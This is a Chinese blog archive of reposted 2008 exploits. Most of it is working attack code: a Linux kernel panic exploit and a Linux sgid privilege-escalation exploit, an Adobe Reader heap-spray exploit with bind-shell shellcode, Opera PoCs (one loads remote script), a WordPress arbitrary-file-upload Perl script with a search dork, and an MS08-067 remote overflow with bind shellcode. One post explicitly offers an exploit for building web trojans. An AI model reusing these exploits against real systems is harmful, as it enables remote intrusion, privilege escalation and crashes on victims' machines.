存档

‘矩阵毒刺’ 分类的存档

Linux Kernel < 2.4.36.9/2.6.27.5 Unix Sockets Local Kernel Panic Exploit

2008年11月12日 没有评论 54 views

#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>
#include <assert.h>
#include <err.h>
#include <stdlib.h>

static int own_child(int *us)
{
        int pid;
        int s[2];
        struct msghdr mh;
        char crap[1024];
        struct iovec iov;
        struct cmsghdr *c;
        int *fd;
        int rc;

        pid = fork();
        if (pid == -1)
                err(1, "fork()");

        if (pid) {
              close(us[1]);

                return pid;
        }

        close(us[0]);

        memset(&mh, 0, sizeof(mh));
        iov.iov_base = "a";
        iov.iov_len  = 1;

        mh.msg_iov        = &iov;
        mh.msg_iovlen     = 1;
        mh.msg_control    = crap;
        mh.msg_controllen = sizeof(crap);

        c = CMSG_FIRSTHDR(&mh);
        assert(c);

        c->cmsg_level = SOL_SOCKET;
        c->cmsg_type  = SCM_RIGHTS;

        fd = (int*) CMSG_DATA(c);
        assert(fd);

        c->cmsg_len = CMSG_LEN(sizeof(int));
        mh.msg_controllen = c->cmsg_len;

        while (1) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == -1)
                        err(1, "socketpair()");

                *fd = s[0];

                rc = sendmsg(us[1], &mh, 0);
                if (rc == -1)
                        err(1, "sendmsg()");

                if (rc != iov.iov_len)
                        errx(1, "sent short");

                close(s[0]);
                close(us[1]);
                us[1] = s[1];
        }
}

static void own(void)
{       
        static int pid;
        static int us[2];
        char crap[1024];
        char morte[1024];
        struct cmsghdr *c;
        int rc;
        struct msghdr mh;
        struct iovec iov;
        int *fds;

        if (!pid) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == -1)
                        err(1, "socketpair()");
                pid = own_child(us);
        }

        iov.iov_base = morte;
        iov.iov_len  = sizeof(morte);

        memset(&mh, 0, sizeof(mh));
        mh.msg_iov        = &iov;
        mh.msg_iovlen     = 1;
        mh.msg_control    = crap;
        mh.msg_controllen = sizeof(crap);

        rc = recvmsg(us[0], &mh, 0);
        if (rc == -1)
                err(1, "recvmsg()");

        if (rc == 0)
                errx(1, "EOF");

        c = CMSG_FIRSTHDR(&mh);
        assert(c);
        assert(c->cmsg_type == SCM_RIGHTS);

        fds = (int*) CMSG_DATA(c);
        assert(fds);

        close(us[0]);
        us[0] = *fds;
}

int main(int argc, char *argv[])
{
  own();
  exit(0);
}


分类: 矩阵毒刺 标签:

Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit #2

2008年11月7日 没有评论 64 views

  Adobe Reader Javascript Printf Buffer Overflow Exploit
  ===========================================================
  Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
  CVE-2008-2992
  Thanks to coresecurity for the technical background.
  6Nov,2008: Exploit released by me
  Credits: Debasis Mohanty
  www.hackingspirits.com
  www.coffeeandsecurity.com
  ===========================================================
  //Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
  //www.coffeeandsecurity
  //www.hackingspirits.com
  // win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
  var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350");
  //Heap Spray starts here - Kiddos don't mess up with this
  var nop ="";
  for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
  heapblock = nop + payload;
  bigblock = unescape("%u9090%u9090");
  headersize = 20;
  spray = headersize+heapblock.length
  while (bigblock.length<spray) bigblock+=bigblock;
  fillblock = bigblock.substring(0, spray);
  block = bigblock.substring(0, bigblock.length-spray);
  while(block.length+spray < 0x40000) block = block+block+fillblock;
  mem = new Array();
  for (i=0;i<1400;i++) mem[i] = block + heapblock;
  // reference snippet from core security
  // http://www.coresecurity.com/content/adobe-reader-buffer-overflow
  var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  util.printf("%45000f",num);
  # milw0rm.com [2008-11-05]

分类: 矩阵毒刺 标签:

Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit

2008年11月7日 没有评论 53 views

  Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Exploit
  author: Elazar
  http://milw0rm.com/sploits/2008-APSB08-19.pdf
  # milw0rm.com [2008-11-05]

分类: 矩阵毒刺 标签:

MS08-067网马

2008年11月2日 没有评论 107 views

已经出来有一周了,很多人还在忙着编译,放个可以做网马的exploit出来。
又一场腥风血雨

#include 

// This is the decompiled function sub_5B86A51B in netapi32.dll on XP SP3

int ms08_067(wchar_t* path)
{
wchar_t* p;
wchar_t* q;
wchar_t* previous_slash = NULL;
wchar_t* current_slash = NULL;
wchar_t ch;

// If the path starts with a server name, skip it

if ((path[0] == L'\\' || path[0] == L'/') &&
(path[1] == L'\\' || path[1] == L'/'))
{
p = path+2;

while (*p != L'\\' || *p != L'/') {
if (*p == L'\0')
return 0;
p++;
}

p++;

// make path point after the server name

path = p;

// make sure the server name is followed by a single slash

if (path[0] == L'\\' || path[0] == L'/')
return 0;
}

if (path[0] == L'\0') // return if the path is empty
return 1;

// Iterate through the path and canonicalize ..\ and .\

p = path;

while (1) {
if (*p == L'\\') {
// we have a slash

if (current_slash == p-1) // don't allow consequtive slashes
return 0;

// store the locations of the current and previous slashes

previous_slash = current_slash;
current_slash = p;
}
else if (*p == L'.' && (current_slash == p-1 || p == path)) {
// we have \. or ^.

if (p[1] == L'.' && (p[2] == L'\\' || p[2] == L'\0')) {
// we have a \..\, \..$, ^..\ or ^..$ sequence

if (previous_slash == NULL)
return 0;

// example: aaa\bbb\..\ccc
// ^ ^ ^
// | | &p[2]
// | |
// | current_slash
// |
// previous_slash

ch = p[2];

wcscpy(previous_slash, &p[2]);

if (ch == L'\0')
return 1;

current_slash = previous_slash;
p = previous_slash;

// find the slash before p

// BUG: if previous_slash points to the beginning of the
// string, we'll go beyond the start of the buffer
//
// example string: \a\..\

q = p-1;

while (*q != L'\\' && q != path)
q--;

if (*p == L'\\')
previous_slash = q;
else
previous_slash = NULL;
}
else if (p[1] == L'\\') {
// we have \.\ or ^.\

if (current_slash != NULL) {
wcscpy(current_slash, &p[1]);
goto end_of_loop;
}
else { // current_slash == NULL
wcscpy(p, p+2);
goto end_of_loop;
}
}
else if (p[1] != L'\0') {
// we have \. or ^. followed by some other char

if (current_slash != NULL) {
p = current_slash;
}
*p = L'\0';
return 1;
}
}

p++;

end_of_loop:
if (*p == L'\0')
return 1;
}
}

// Run this program to simulate the MS08-067 vulnerability

int main()
{
return ms08_067(L"\\a\\..\\");

分类: 矩阵毒刺 标签: ,

Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC

2008年11月2日 2 条评论 93 views

Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC

<!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>

# milw0rm.com [2008-10-30]

分类: 矩阵毒刺 标签: ,

Opera 9.61 opera:historysearch Code Execution Exploit PoC

2008年11月2日 没有评论 54 views

Opera 9.61 opera:historysearch Code Execution Exploit PoC

<!--
--Aviv.

http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx
-->

<html>
<script>
function x() {
  window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="x()">Click me...</a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
</body>
</html>

# milw0rm.com [2008-10-30]

分类: 矩阵毒刺 标签: ,

Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit

2008年11月2日 没有评论 99 views

/*
gw-ftrex.c:

Linux kernel < 2.6.22 open/ftruncate local exploit
by <gat3way at gat3way dot eu>

bug information:
http://osvdb.org/49081

!!!This is for educational purposes only!!!

To use it, you've got to find a sgid directory you've got
permissions to write into (obviously world-writable), e.g:
find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx"
which fortunately is not common those days :)
And also a shell that does not drop sgid privs upon execution (like ash/sash).
E.g:

test:/fileserver/samba$ ls -ld
drwxrwsrwx 2 root root 4096 2008-10-27 16:27.
test:/fileserver/samba$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
test:/fileserver/samba$ /tmp/gw-ftrex
ash shell found!
size=80200
We're evil evil evil!

$ id
uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data)

Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia.
*/

#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
char *buf=malloc(3096*1024); //3mb just to be sure
int a,len;
int fd,fd1;
char *buf1;
int shell=0;

if (stat("/bin/ash",buf)==0)
{
    printf("ash shell found!\n");
    shell=1;
}

if (shell==0) if (stat("/bin/sash",buf)==0)
{
    printf("sash shell found!\n");
    shell=1;
}

if (shell==0)
{
    printf("no suitable shell found (one that does not drop sgid permissions) :(\n");
    exit(2);
}

len=0;
if (shell==1) fd=open("/bin/ash",O_RDONLY);
if (shell==2) fd=open("/bin/sash",O_RDONLY);

while (read(fd,buf+len,1)) len++;

printf("size=%d\n",len);
fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750);
ftruncate(fd1, len);
buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0);
memcpy(buf1,buf,len); 
munmap(buf1,len);
close(fd1);close(fd);
free(buf);
printf("We're evil evil evil!\n\n");
execv(".evilsploit", NULL);
}

// milw0rm.com [2008-10-27]

分类: 矩阵毒刺 标签: ,

WordPress Plugin e-Commerce <= 3.4 Arbitrary File Upload Exploit

2008年10月30日 没有评论 215 views

WordPress Plugin e-Commerce < = 3.4 Arbitrary File Upload Exploit

#!/usr/bin/perl

use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

my $fname = rand(99999) . ".php"; # no int()

print < - WordPress Plugin e-Commerce < = 3.4 Arbitrary File Upload -
Discovered && Coded by: t0pP8uZz
Discovered on: 20 October 2008

Theres no current vulnerabilitys for this plugin, but the
vulnerability explained here no longer exists in the later
versions of the plugin, due to a code rewrite.

In testing this vulnerability, i wrote a scraping content
program, and found ALOT of vulnerable sites.

This exploit will upload a selected file to the...
... /wp-content/plugins/wp-shopping-cart/ directory.

If the directory is not writable (rare cases) you can
mod this exploit and use the insecure GET variable
"imagedir" to directory traversal.. so you can upload
in diffrent directorys.

Contact: irc.rizon.net #sectalk

Dork: inurl:"/wp-content/plugins/wp-shopping-cart/"

INTRO

print "\nEnter URL(ie: http://site.com/mambo): ";
chomp(my $url=);

print "\nEnter File Path(path to local file to upload): ";
chomp(my $file=);

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url . '/wp-content/plugins/wp-shopping-cart/image_processing.php',
Content_Type => 'form-data',
Content => [ Submit => "Add", image => [ $file, $fname, Content_Type => 'plain/text' ], ] );

die "Exploit Failed: HTTP POST Failed!" unless $re->is_success;

if($re->content =~ /Fatal error/i) {
print "Complete! To see if exploit was successfull visit the following URL for your uploaded file.\n";
print "Uploaded File: " . $url . "/wp-content/plugins/wp-shopping-cart/" . $fname . "\n";
} else
{
print "Exploit Failed! Target host not vulnerable!\n";
}
exit;

# milw0rm.com [2008-10-29]

分类: 矩阵毒刺 标签: ,

MS08-067 Remote Stack Overflow Vulnerability Exploit

2008年10月29日 没有评论 478 views

Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date: 2008-10-28

#include "stdafx.h"
#include
#include
#include
#include

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
#pragma comment(lib, "ws2_32")

struct RPCBIND
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
WORD MaxXmitFrag;
WORD MaxRecvFrag;
DWORD AssocGroup;
BYTE NumCtxItems;
WORD ContextID;
WORD NumTransItems;
GUID InterfaceUUID;
WORD InterfaceVerMaj;
WORD InterfaceVerMin;
GUID TransferSyntax;
DWORD SyntaxVer;
};

struct RPCFUNC
{
BYTE VerMaj;
BYTE VerMin;
BYTE PacketType;
BYTE PacketFlags;
DWORD DataRep;
WORD FragLength;
WORD AuthLength;
DWORD CallID;
DWORD AllocHint;
WORD ContextID;
WORD Opnum;
};

BYTE PRPC[0x48] = {
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

BYTE EXPLOIT[] =
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xA4\x00\x00\x00\x01\x00\x00\x00\x94\x00"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\x2F\x00\x00\x00\x00\x00\x00\x00\x2F\x00\x00\x00"

"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"

"\x41\x41"

"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"

"\x12\x45\xfa\x7f" // jmp esp
"\x90\x8B\xF4\x81"
"\x3E\x90\x90\x90\x90\x74\x04\x4E\x4E\xEB\xF4\x33\xC9\x33\xDB\xB1"
"\x01\xC1\xE1\x09\x8B\xFC\x4B\xC1\xE3\x0D\x23\xFB\x57\xF3\xA4\x5F"
// "\xB1\x01\xC1\xE1\x09\x2B\xE1\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"

"\x83\xEC\x70\x90\x90\x90\x90\xFF\xE7\x41\x41\x41\x41\x41\x41\x41"

"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";

BYTE POP[] =//stub header RPCFUNC structure
"\x05\x00"
"\x00\x03\x10\x00\x00\x00\xE4\x01\x00\x00\x01\x00\x00\x00\xD4\x01"
"\x00\x00\x00\x00\x1f\x00"
"\x00\x00\x00\x00"
"\xCF\x00\x00\x00\x00\x00\x00\x00\xCF\x00\x00\x00"

"\x5c\x00"
"\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xCC\x41"

"\x00\x00\x00\x00\x01\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5C\x00"
"\x00\x00"
"\x01\x00\x00\x00\x01\x00\x00\x00";

unsigned char bind_shellcode[] =
// "\xCC"
// "\x83\xEC\x40" // sub esp, 0x70
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xad"
"\x07\xe6\x4a\x83\xeb\xfc\xe2\xf4\x51\x6d\x0d\x07\x45\xfe\x19\xb5"
"\x52\x67\x6d\x26\x89\x23\x6d\x0f\x91\x8c\x9a\x4f\xd5\x06\x09\xc1"
"\xe2\x1f\x6d\x15\x8d\x06\x0d\x03\x26\x33\x6d\x4b\x43\x36\x26\xd3"
"\x01\x83\x26\x3e\xaa\xc6\x2c\x47\xac\xc5\x0d\xbe\x96\x53\xc2\x62"
"\xd8\xe2\x6d\x15\x89\x06\x0d\x2c\x26\x0b\xad\xc1\xf2\x1b\xe7\xa1"
"\xae\x2b\x6d\xc3\xc1\x23\xfa\x2b\x6e\x36\x3d\x2e\x26\x44\xd6\xc1"
"\xed\x0b\x6d\x3a\xb1\xaa\x6d\x0a\xa5\x59\x8e\xc4\xe3\x09\x0a\x1a"
"\x52\xd1\x80\x19\xcb\x6f\xd5\x78\xc5\x70\x95\x78\xf2\x53\x19\x9a"
"\xc5\xcc\x0b\xb6\x96\x57\x19\x9c\xf2\x8e\x03\x2c\x2c\xea\xee\x48"
"\xf8\x6d\xe4\xb5\x7d\x6f\x3f\x43\x58\xaa\xb1\xb5\x7b\x54\xb5\x19"
"\xfe\x54\xa5\x19\xee\x54\x19\x9a\xcb\x6f\xf7\x16\xcb\x54\x6f\xab"
"\x38\x6f\x42\x50\xdd\xc0\xb1\xb5\x7b\x6d\xf6\x1b\xf8\xf8\x36\x22"
"\x09\xaa\xc8\xa3\xfa\xf8\x30\x19\xf8\xf8\x36\x22\x48\x4e\x60\x03"
"\xfa\xf8\x30\x1a\xf9\x53\xb3\xb5\x7d\x94\x8e\xad\xd4\xc1\x9f\x1d"
"\x52\xd1\xb3\xb5\x7d\x61\x8c\x2e\xcb\x6f\x85\x27\x24\xe2\x8c\x1a"
"\xf4\x2e\x2a\xc3\x4a\x6d\xa2\xc3\x4f\x36\x26\xb9\x07\xf9\xa4\x67"
"\x53\x45\xca\xd9\x20\x7d\xde\xe1\x06\xac\x8e\x38\x53\xb4\xf0\xb5"
"\xd8\x43\x19\x9c\xf6\x50\xb4\x1b\xfc\x56\x8c\x4b\xfc\x56\xb3\x1b"
"\x52\xd7\x8e\xe7\x74\x02\x28\x19\x52\xd1\x8c\xb5\x52\x30\x19\x9a"
"\x26\x50\x1a\xc9\x69\x63\x19\x9c\xff\xf8\x36\x22\x42\xc9\x06\x2a"
"\xfe\xf8\x30\xb5\x7d\x07\xe6\x4a";

int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer)
{
BYTE rbuf[0x1000]="";
DWORD dw=0;
struct RPCBIND RPCBind;

memcpy(&RPCBind,&PRPC,sizeof(RPCBind));
UuidFromString((unsigned char *)Interface,&RPCBind.InterfaceUUID);
UuidToString(&RPCBind.InterfaceUUID,(unsigned char **)&Interface);
RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]);
RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]);
TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf,sizeof(rbuf), &dw, NULL);

return 0;
}

int main(int argc, char* argv[])
{
char *server;
NETRESOURCE nr;
char unc[MAX_PATH];
char szPipe[MAX_PATH];
HANDLE hFile;
WSADATA wsa;

int bwritten=0;
BYTE rbuf[0x100]="";
DWORD dw;
PVOID ptr = (PVOID)&POP;

printf( "\tMS08-067 Remote Stack Overflow Vulnerability Exploit(POC)\n\n" );
printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/10/27\n" );
printf( "Thanks isno and PolyMeta\n" );
printf( "ShellCode Function: bindshell port:4444\n" );
printf( "usage:\n%s [IP]\n", argv[0] );

if ( argc != 2 ) {

return 0;
}

if ( WSAStartup(MAKEWORD(2,2),&wsa) != 0 ) {

printf( "WSAStartup failed\n" );
return 0;
}

memcpy((char *)ptr + 74, bind_shellcode, sizeof(bind_shellcode)-1);

server=argv[1];
_snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server);
unc[sizeof(unc)-1] = 0;
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;
nr.lpRemoteName = unc;
nr.lpProvider = NULL;

printf( "connect %s ipc$ .... ", server );

if ( WNetAddConnection2(&nr, "", "", 0) != 0 ) {

printf( "failed\n" );
return 0;
} else {

printf( "su
ccess!\n" );
}

_snprintf(szPipe, sizeof(szPipe),"\\\\%s\\pipe\\browser",server);
printf( "open \\\\%s\\pipe\\browser ....", server );
hFile = CreateFile( szPipe,
GENERIC_READ|GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING, 0, NULL);
if ( hFile == (HANDLE)-1 ) {

printf( "failed!\n" );
return 0;
} else {

printf( "success!\n" );
}

printf( "Bind Rpc 4b324fc8-1670-01d3-1278-5a47bf6ee188 Interface\n" );
BindRpcInterface(hFile,"4b324fc8-1670-01d3-1278-5a47bf6ee188","3.0");

printf( "Send shellcode ....\n" );
TransactNamedPipe(hFile, (PVOID)&POP, sizeof(POP) - 1, rbuf, sizeof(rbuf), &dw, NULL);

printf( "Send Exploit ...... \n" );
TransactNamedPipe(hFile, (PVOID)&EXPLOIT, sizeof(EXPLOIT) - 1, rbuf, sizeof(rbuf), &dw, NULL);

CloseHandle( hFile );

return 0;
}WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/

分类: 矩阵毒刺 标签:

